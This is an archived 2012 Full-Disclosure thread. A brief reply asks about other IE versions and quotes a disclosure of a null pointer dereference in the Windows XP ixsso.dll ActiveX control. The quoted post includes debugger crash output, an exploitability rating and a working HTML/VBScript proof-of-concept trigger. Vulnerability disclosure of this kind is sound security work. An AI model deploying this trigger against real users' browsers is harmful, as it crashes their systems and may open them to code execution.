lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <00a701cd877a$2e2ad010$8a807030$@itsecuritypros.org>
Date: Fri, 31 Aug 2012 09:11:49 -0400
From: "Michael D. Wood" <mike@...ecuritypros.org>
To: "'kaveh ghaemmaghami'" <kavehghaemmaghami@...glemail.com>,
<full-disclosure@...ts.grok.org.uk>
Subject: Re: Microsoft Indexing Service
Server-side (ixsso.dll) null pointer dereference
Version: 5.1.2600.5512
Tested on: windows XP Sp3 ENG
Did you do any tests on different versions of IE or?
--
Michael D. Wood
ITSecurityPros.org
www.itsecuritypros.org
-----Original Message-----
From: full-disclosure-bounces@...ts.grok.org.uk
[mailto:full-disclosure-bounces@...ts.grok.org.uk] On Behalf Of kaveh
ghaemmaghami
Sent: Friday, August 24, 2012 5:04 AM
To: full-disclosure@...ts.grok.org.uk
Subject: [Full-disclosure] Microsoft Indexing Service Server-side
(ixsso.dll) null pointer dereference
Exploit Title: Microsoft Indexing Service Server-side (ixsso.dll) null
pointer dereference Crash :
http://img836.imageshack.us/img836/7742/microsoftf.png
Date: 2012-08-24
Author: coolkaveh
coolkaveh@...ketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://http://www.microsoft.com/
Version: 5.1.2600.5512
Tested on: windows XP Sp3 ENG
Greets To Mohammad Morteza Sanaie
sanaie.morteza@...il.com
----------------------------------------------------------------------------
-------------
Class CissoQuery
GUID: {A4463024-2B6F-11D0-BFBC-0020F8008024}
Number of Interfaces: 1
Default Interface: IixssoQuery
RegKey Safe for Script: True
RegkeySafe for Init: True
----------------------------------------------------------------------------
-------------
Report for Clsid: {A4463024-2B6F-11D0-BFBC-0020F8008024}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller
----------------------------------------------------------------------------
-------------
(c8c.85c): Access violation - code c0000005 (first chance) First chance
exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02e126d0 ecx=774fef18 edx=0020e5ea esi=0020e5c4
edi=00000000
eip=65da3d35 esp=02a4f070 ebp=02a4f098 iopl=0 nv up ei ng nz na pe
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010286
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\WINDOWS\system32\ixsso.dll -
ixsso!DllCanUnloadNow+0xeac:
65da3d35 8b08 mov ecx,dword ptr [eax]
ds:0023:00000000=????????
Missing image name, possible paged-out or corrupt data.
0:012> !load winext\msec.dll
0:012> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine Event
Type: Exception
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\WINDOWS\system32\OLEAUT32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\WINDOWS\system32\mshtml.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for
C:\WINDOWS\system32\vbscript.dll - Exception Faulting Address: 0x0 First
Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005) Exception
Sub-Type: Read Access Violation
Faulting Instruction:65da3d35 mov ecx,dword ptr [eax]
Basic Block:
65da3d35 mov ecx,dword ptr [eax]
Tainted Input Operands: eax
65da3d37 lea edx,[ebp+8]
65da3d3a push edx
65da3d3b push offset ixsso+0x1400 (65da1400)
65da3d40 push eax
Tainted Input Operands: eax
65da3d41 mov dword ptr [ebp+8],edi
65da3d44 mov dword ptr [ebp-0ch],edi
65da3d47 mov dword ptr [ebp-8],edi
65da3d4a mov dword ptr [ebp-4],edi
65da3d4d call dword ptr [ecx]
Tainted Input Operands: ecx, StackContents
Exception Hash (Major/Minor): 0x3716130a.0x43133e77
Stack Trace:
ixsso!DllCanUnloadNow+0xeac
OLEAUT32!DispCallFunc+0xc3
OLEAUT32!DispCallFunc+0x6d2
OLEAUT32!DispInvoke+0x23
ixsso!DllCanUnloadNow+0x391
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc86d3
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8ce9
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8736
vbscript!DllGetClassObject+0x12b6d
vbscript!DllGetClassObject+0x12ae0
vbscript!DllGetClassObject+0x12a81
vbscript+0x3da8
vbscript+0x40bf
vbscript+0x6412
vbscript+0x6397
vbscript+0x6bed
vbscript+0x6de5
vbscript!DllCanUnloadNow+0x15b6
vbscript+0xa306
mshtml+0xa195b
mshtml+0xa1804
mshtml+0xa18f0
mshtml+0xa06f5
Instruction Address: 0x0000000065da3d35
Description: Data from Faulting Address controls Code Flow Short
Description: TaintedDataControlsCodeFlow Exploitability Classification:
PROBABLY_EXPLOITABLE Recommended Bug Title: Probably Exploitable - Data from
Faulting Address controls Code Flow starting at
ixsso!DllCanUnloadNow+0x0000000000000eac (Hash=0x3716130a.0x43133e77)
The data from the faulting address is later used as the target for a branch.
----------------------------------------------------------------------------
----------------------------------------------------------------------------
<html>
Exploit
<object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024'
id='target' /></object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\ixsso.dll"
prototype = "Property Let OnStartPage As object"
memberName = "OnStartPage"
progid = "Cisso.CissoQuery"
argCount = 1
Set arg1=Nothing
target.OnStartPage arg1
</script>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Download attachment "smime.p7s" of type "application/pkcs7-signature" (6139 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists